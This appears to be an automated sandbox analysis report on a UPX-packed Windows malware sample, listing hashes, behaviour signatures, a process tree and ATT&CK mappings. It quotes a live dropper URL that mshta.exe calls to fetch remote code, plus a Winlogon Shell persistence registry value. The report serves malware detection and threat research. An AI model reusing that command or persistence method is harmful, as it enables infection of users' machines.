c84b93ea9418e569a419b29a12a34687767b9a5f970fee6b44bee1a535c10f12

Analysis

max time kernel
150s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
27/06/2024, 21:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe
Size

767KB
MD5

178e23ce61f1c87fb69a2d23ce241c03
SHA1

b87efed82f2472022388981cfdd295c330076adb
SHA256

c84b93ea9418e569a419b29a12a34687767b9a5f970fee6b44bee1a535c10f12
SHA512

faaea84772419c24c49a1d1f072e19ccecbf6b498de4227b1b649e9fc3109fd46c6bb26ac0aae0c1ab8b883a1664efe8d2c69b09a840af226647f6056bbc4186
SSDEEP

12288:TsC/xLjZPUyBiLCCKG3NTJUVtn5OmujtCXh/eBd7cmnRhQpYaKIPPzeNjtH0Q2Pq:Yuj2y+CC99NKtnekRmBhRh9aKIPLotUQ

Score

10^/10

persistence upx

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://repoiury.com/inst.php?id=lee_02&lang=ENU

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\palladium.exe"	jh.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	jh.exe

Executes dropped EXE 2 IoCs

pid	Process
2312	jh.exe
2980	jh1.exe

UPX packed file 19 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1840-1-0x0000000000400000-0x00000000004F1000-memory.dmp	upx
behavioral2/files/0x0003000000022965-12.dat	upx
behavioral2/memory/2312-16-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/1840-33-0x0000000000400000-0x00000000004F1000-memory.dmp	upx
behavioral2/memory/2312-41-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2312-42-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2312-43-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2312-45-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2312-46-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2312-47-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2312-48-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2312-49-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2312-50-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2312-51-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2312-52-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2312-53-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2312-54-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2312-55-0x0000000000400000-0x0000000000802000-memory.dmp	upx
behavioral2/memory/2312-56-0x0000000000400000-0x0000000000802000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3184	2980	WerFault.exe	96

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe
2312	jh.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2312	jh.exe
2312	jh.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1840 wrote to memory of 2312	1840	178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe	95
PID 1840 wrote to memory of 2312	1840	178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe	95
PID 1840 wrote to memory of 2312	1840	178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe	95
PID 1840 wrote to memory of 2980	1840	178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe	96
PID 1840 wrote to memory of 2980	1840	178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe	96
PID 1840 wrote to memory of 2980	1840	178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe	96
PID 2312 wrote to memory of 4792	2312	jh.exe	98
PID 2312 wrote to memory of 4792	2312	jh.exe	98
PID 2312 wrote to memory of 4792	2312	jh.exe	98
PID 2312 wrote to memory of 1728	2312	jh.exe	99
PID 2312 wrote to memory of 1728	2312	jh.exe	99
PID 2312 wrote to memory of 1728	2312	jh.exe	99

C:\Users\Admin\AppData\Local\Temp\178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\178e23ce61f1c87fb69a2d23ce241c03_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1840
- C:\Users\Admin\AppData\Local\Temp\jh.exe
  "C:\Users\Admin\AppData\Local\Temp\jh.exe" lee_02
  2⤵
  - Modifies WinLogon for persistence
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2312
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" http://repoiury.com/inst.php?id=lee_02&lang=ENU
    3⤵
    PID:4792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\asdfasfas.bat" "
    3⤵
    PID:1728
- C:\Users\Admin\AppData\Local\Temp\jh1.exe
  "C:\Users\Admin\AppData\Local\Temp\jh1.exe"
  2⤵
  - Executes dropped EXE
  PID:2980
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2980 -s 480
    3⤵
    - Program crash
    PID:3184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2980 -ip 2980
1⤵
PID:2348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4088,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=3688 /prefetch:8
1⤵
PID:1856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\jh.exe

Filesize
467KB

MD5
c0c286f3d4b4eb46504ae767e371187f

SHA1
715e75e7a596d5a88eac7bb47a9b2fdd88653aea

SHA256
3264c96f8f77cdf612671e1899898e59bcff46d975f6fa77cc6802183dc7c065

SHA512
f999fc28d65edbb074ba1a611543ba9a01f55677b94af037d92ebd0cde42c5077c83b907eb22b4b80dae90c56cf63448548c46ed39732377e66c01327ac0359d

Download Submit
C:\Users\Admin\AppData\Local\Temp\jh1.exe

Filesize
149KB

MD5
6ba6b1580ea3f493ad3d9d915b001909

SHA1
e3abca7ed8450fdf82013958f3db5f2ab541c2b2

SHA256
1fed7b0afe8fc340102514011d6f6605dbe281c190740e2360ab73a1617e2800

SHA512
613e739975dfff40f8cd73a163129b7447c09575b44b63ccf9217367726fd13c5626ad7346554b57b0221f5665a2bd326bc9bef9a4475c2b5eeb636bcf101e4c

Download Submit
C:\Users\Admin\AppData\Roaming\asdfasfas.bat

Filesize
122B

MD5
fddfbd9d59143c6855c0e386b4af0446

SHA1
a60145bf547b703ec4cf078fd955fc690272eb00

SHA256
214aca25c648fad0c7f0b799343f07fb24ba4c7df95a0bd0cac13db70e1ea2d0

SHA512
a8f6dd937fb6c126994186e2e66a0c5dd8ef796ded55153f5f32bffe93f2743f55db9bb96288ab46201db1339e9b9b3c09d5c41da57ad3b668132cca7aac1003

Download Submit
memory/1840-33-0x0000000000400000-0x00000000004F1000-memory.dmp

Filesize
964KB

Download
memory/1840-1-0x0000000000400000-0x00000000004F1000-memory.dmp

Filesize
964KB

Download
memory/2312-44-0x0000000002690000-0x0000000002691000-memory.dmp

Filesize
4KB

Download
memory/2312-48-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2312-41-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2312-42-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2312-43-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2312-16-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2312-45-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2312-46-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2312-47-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2312-18-0x0000000002690000-0x0000000002691000-memory.dmp

Filesize
4KB

Download
memory/2312-49-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2312-50-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2312-51-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2312-52-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2312-53-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2312-54-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2312-55-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download
memory/2312-56-0x0000000000400000-0x0000000000802000-memory.dmp

Filesize
4.0MB

Download